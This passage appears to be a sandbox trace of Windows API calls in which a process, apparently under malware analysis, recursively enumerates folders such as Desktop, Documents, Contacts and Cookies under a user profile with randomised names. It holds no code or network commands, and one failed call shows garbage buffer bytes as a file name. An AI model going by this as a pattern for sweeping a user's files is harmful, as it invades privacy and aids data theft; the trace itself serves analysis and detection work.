ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.631] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.631] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0070.631] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.631] lstrlenW (lpString="Admin") returned 5 [0070.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4e1698 [0070.632] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.632] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.632] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 0 [0070.632] FindClose (in: hFindFile=0x4e1698 | out: hFindFile=0x4e1698) returned 1 [0070.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.632] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0070.632] FindClose (in: hFindFile=0x4dd790 | out: hFindFile=0x4dd790) returned 1 [0070.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1440 | out: hHeap=0x4a0000) returned 1 [0070.632] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddfccb60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddfccb60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0070.632] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.632] lstrlenW (lpString="Program Files") returned 13 [0070.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4dd790 [0070.632] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.632] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.632] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0070.632] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.633] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz") returned 20 [0070.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4e1698 [0070.633] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.633] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.633] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="AppData", cAlternateFileName="")) returned 1 [0070.633] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.633] lstrlenW (lpString="AppData") returned 7 [0070.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x4d7aa0, ftCreationTime.dwLowDateTime=0x4c45e8, ftCreationTime.dwHighDateTime=0x39466735, ftLastAccessTime.dwLowDateTime=0x6f32546e, ftLastAccessTime.dwHighDateTime=0x55773375, ftLastWriteTime.dwLowDateTime=0x33456734, ftLastWriteTime.dwHighDateTime=0x57463075, nFileSizeHigh=0x51735264, nFileSizeLow=0x32695a36, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="㡂卦癈䵓癗䅌卂坳䕥啳਍ね㝦偦㑒潅杫䉤偢呕䠫癶獱㡭偶灩礸湮乔畷㍴㝴㍱䵆䵥渵硷㉫⭈歧䥓䥏汸਍睫却獤敓奩㉏浂⽵杚穱但づ䥏㝐瑓⽸头佩楕䱢欰济塙癗癅㑸㥶獌ㅵ硬⽺偷਍捳摣督桨⭌橷㙖浄畇敨く剨㍪戲偦䡭湆畔偅佤䱨啘儸晏が癧䡔䭴塯煱穇場਍慓䉋扥湨佂湭楲㑗㍰㉹捷娫兹祮⽆灪獥癒⽈栯灚䅃桃瀱究㍋䴰䝧稫⭂楇倯਍瘳杋甫久䱗⭩⼯兑搶祚㌷搫穔㐰䱔㝚刲硏潊獱眳剐䝷杌䉮㍪㥸䵒慺丯娳牊਍畑樲浰㍨㡯⼳䬱⭩刹婸汈䙓䅅䍮な㕴呵啈㕖嘱啖ㅸ穚䥮䭸奬䩈䑙硱畱㝩佥਍稲䴰㕓橔㌯䘵䐸才甯䙌啍挵ㄴ捋䍭㐷䅘砵睘䙰塈䉅㍘䱂䵣䤱㥕浌㕢䅂楃礷਍䡄湆浇穣㙥㍈䩲桱湶⭐䨳卉杕㥢扏灹䩰灮杔橺䡤䱷穘䈯䱵䌰䡹癙䙌祶㙕礫ꎿ∹⾕", cAlternateFileName="杔橺䡤䱷穘䈯䱵䌰䡹癙䙌祶㙕礫ꎿ∹⾕")) returned 0xffffffff [0070.633] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.633] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Contacts", cAlternateFileName="")) returned 1 [0070.633] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.633] lstrlenW (lpString="Contacts") returned 8 [0070.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4c4120 [0070.634] FindNextFileW (in: hFindFile=0x4c4120, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.634] FindNextFileW (in: hFindFile=0x4c4120, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0070.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.634] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0070.634] FindClose (in: hFindFile=0x4c4120 | out: hFindFile=0x4c4120) returned 1 [0070.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.634] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Cookies", cAlternateFileName="")) returned 1 [0070.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.634] lstrlenW (lpString="Cookies") returned 7 [0070.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x4d8c68, ftCreationTime.dwLowDateTime=0x4c45e8, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0070.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.634] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaecc7800, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xaecc7800, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Desktop", cAlternateFileName="")) returned 1 [0070.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.634] lstrlenW (lpString="Desktop") returned 7 [0070.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaecc7800, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xaecc7800, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4c4120 [0070.635] FindNextFileW (in: hFindFile=0x4c4120, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaecc7800, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xaecc7800, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.635] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.635] FindNextFileW (in: hFindFile=0x4c4120, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f37750, ftCreationTime.dwHighDateTime=0x1d5dcb1, ftLastAccessTime.dwLowDateTime=0x7ae85670, ftLastAccessTime.dwHighDateTime=0x1d5e2c1, ftLastWriteTime.dwLowDateTime=0x7ae85670, ftLastWriteTime.dwHighDateTime=0x1d5e2c1, nFileSizeHigh=0x0, nFileSizeLow=0x53a5, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="0rcI8dNPsQa.ots", cAlternateFileName="0RCI8D~1.OTS")) returned 1 [0070.635] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.635] lstrlenW (lpString="0rcI8dNPsQa.ots") returned 15 [0070.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\*", lpFindFileData=0x4d8d38 | out: lpFindFileData=0x4d8d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac77c490, ftCreationTime.dwHighDateTime=0x1d5e00b, ftLastAccessTime.dwLowDateTime=0x9fa58e50, ftLastAccessTime.dwHighDateTime=0x1d5e65a, ftLastWriteTime.dwLowDateTime=0x9fa58e50, ftLastWriteTime.dwHighDateTime=0x1d5e65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d99d0 [0070.635] FindNextFileW (in: hFindFile=0x4d99d0, lpFindFileData=0x4d8d38 | out: lpFindFileData=0x4d8d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac77c490, ftCreationTime.dwHighDateTime=0x1d5e00b, ftLastAccessTime.dwLowDateTime=0x9fa58e50, ftLastAccessTime.dwHighDateTime=0x1d5e65a, ftLastWriteTime.dwLowDateTime=0x9fa58e50, ftLastWriteTime.dwHighDateTime=0x1d5e65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.635] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.635] FindNextFileW (in: hFindFile=0x4d99d0, lpFindFileData=0x4d8d38 | out: lpFindFileData=0x4d8d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf66510, ftCreationTime.dwHighDateTime=0x1d5e749, ftLastAccessTime.dwLowDateTime=0xc1683d40, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0xc1683d40, ftLastWriteTime.dwHighDateTime=0x1d5e113, nFileSizeHigh=0x0, nFileSizeLow=0xa350, dwReserved0=0x0, dwReserved1=0x0, cFileName="22Df7iMWnQgkG.jpg", cAlternateFileName="22DF7I~1.JPG")) returned 1 [0070.635] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.636] lstrlenW (lpString="22Df7iMWnQgkG.jpg") returned 17 [0070.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\*", lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c36e700, ftCreationTime.dwHighDateTime=0x1d5e62b, ftLastAccessTime.dwLowDateTime=0xbcbc35f0, ftLastAccessTime.dwHighDateTime=0x1d5e6e8, ftLastWriteTime.dwLowDateTime=0xbcbc35f0, ftLastWriteTime.dwHighDateTime=0x1d5e6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4dd498 [0070.636] FindNextFileW (in: hFindFile=0x4dd498, lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c36e700, ftCreationTime.dwHighDateTime=0x1d5e62b, ftLastAccessTime.dwLowDateTime=0xbcbc35f0, ftLastAccessTime.dwHighDateTime=0x1d5e6e8, ftLastWriteTime.dwLowDateTime=0xbcbc35f0, ftLastWriteTime.dwHighDateTime=0x1d5e6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.636] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.636] FindNextFileW (in: hFindFile=0x4dd498, lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x209a3910, ftCreationTime.dwHighDateTime=0x1d5db12, ftLastAccessTime.dwLowDateTime=0xdd1ee860, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0xdd1ee860, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x18dac, dwReserved0=0x0, dwReserved1=0x0, cFileName="0hIBcRL.png", cAlternateFileName="")) returned 1 [0070.636] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.636] lstrlenW (lpString="0hIBcRL.png") returned 11 [0070.636] FindClose (in: hFindFile=0x4dd498 | out: hFindFile=0x4dd498) returned 1 [0070.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec298 | out: hHeap=0x4a0000) returned 1 [0070.637] FindNextFileW (in: hFindFile=0x4d99d0, lpFindFileData=0x4d8d38 | out: lpFindFileData=0x4d8d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7bfb4a0, ftCreationTime.dwHighDateTime=0x1d5da82, ftLastAccessTime.dwLowDateTime=0xca5f9950, ftLastAccessTime.dwHighDateTime=0x1d5e543, ftLastWriteTime.dwLowDateTime=0xca5f9950, ftLastWriteTime.dwHighDateTime=0x1d5e543, nFileSizeHigh=0x0, nFileSizeLow=0x17974, dwReserved0=0x0, dwReserved1=0x0, cFileName="o_rjZ7.bmp", cAlternateFileName="")) returned 1 [0070.637] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.637] lstrlenW (lpString="o_rjZ7.bmp") returned 10 [0070.637] FindClose (in: hFindFile=0x4d99d0 | out: hFindFile=0x4d99d0) returned 1 [0070.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8d38 | out: hHeap=0x4a0000) returned 1 [0070.637] FindNextFileW (in: hFindFile=0x4c4120, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41910c50, ftCreationTime.dwHighDateTime=0x1d5da88, ftLastAccessTime.dwLowDateTime=0x4fdba600, ftLastAccessTime.dwHighDateTime=0x1d5e535, ftLastWriteTime.dwLowDateTime=0x4fdba600, ftLastWriteTime.dwHighDateTime=0x1d5e535, nFileSizeHigh=0x0, nFileSizeLow=0x158f8, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="35Bin.flv", cAlternateFileName="")) returned 1 [0070.637] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.637] lstrlenW (lpString="35Bin.flv") returned 9 [0070.637] FindClose (in: hFindFile=0x4c4120 | out: hFindFile=0x4c4120) returned 1 [0070.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.637] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8eb7e00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8eb7e00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0070.637] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.637] lstrlenW (lpString="Documents") returned 9 [0070.638] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8eb7e00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8eb7e00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.638] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8eb7e00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8eb7e00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.638] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bf23680, ftCreationTime.dwHighDateTime=0x1d56003, ftLastAccessTime.dwLowDateTime=0xec1d6c10, ftLastAccessTime.dwHighDateTime=0x1d5a76e, ftLastWriteTime.dwLowDateTime=0xec1d6c10, ftLastWriteTime.dwHighDateTime=0x1d5a76e, nFileSizeHigh=0x0, nFileSizeLow=0xaf41, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="5f3cIDmwpegYMoeV.xlsx", cAlternateFileName="5F3CID~1.XLS")) returned 1 [0070.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.638] lstrlenW (lpString="5f3cIDmwpegYMoeV.xlsx") returned 21 [0070.638] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\*", lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x10, 